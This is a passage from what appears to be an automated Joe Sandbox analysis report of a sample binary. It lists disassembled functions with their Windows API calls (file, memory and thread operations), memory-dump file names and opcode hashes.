GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E

Strings

@, xrefs: 00402471

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D

Function 0040C9FC Relevance: 3.2, APIs: 2, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5

Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@$??2@ExceptionThrowmemmove
String ID:
API String ID: 4269121280-0
Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99

Function 0040A62F Relevance: 3.1, APIs: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A634
??3@YAXPAX@Z.MSVCRT(?), ref: 0040A729

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@H_prolog
String ID:
API String ID: 1329742358-0
Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B

Function 0040112B Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
Opcode Fuzzy Hash: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754

Function 004022B0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022C0
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022E4

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
Instruction ID: 09ebe67ff45b08f81c36141d9c2dc2e417a159b47c448e0a3757dda97e47d19e
Opcode Fuzzy Hash: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
Instruction Fuzzy Hash: 8CF030351046529FC330DF69C584853F7E4EB59715721887FE1D6D36A2C674A880CB64

Function 0040D9F0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64

Function 0040ECED Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0040ED05
_CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: AllocExceptionStringThrow
String ID:
API String ID: 3773818493-0
Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9

Function 0040E73A Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040E745
LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4

Function 0040A7DE Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A7E3

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A

Function 0040120B Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59

Function 0040DA56 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990

CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94

Function 0040DB97 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54

Function 0040653F Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 00406552

Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ErrorLast_beginthreadex
String ID:
API String ID: 4034172046-0
Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60

Function 0040CC59 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CC5E

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD

Function 0040DADC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54

Function 0040DB6A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02

Function 0040D89F Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000060,?,?,00000000,?,0040D96E,00000000,?,00000000,00000000,000000FF,?,00000001,?,?,?), ref: 0040D91A

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
Instruction ID: 1ceb60bf2594cd826c4dcd58ac8a3e75a9726935558582f6c117c88f0dd7e0c4
Opcode Fuzzy Hash: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
Instruction Fuzzy Hash: 4A219372A042858FCF30FF91D98096B77A5AF50358320853FE093732C1DA38AD49D75A

Function 0040F42D Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040F446

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59

Function 00402F6C Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
Opcode Fuzzy Hash: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299

Function 0040D985 Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

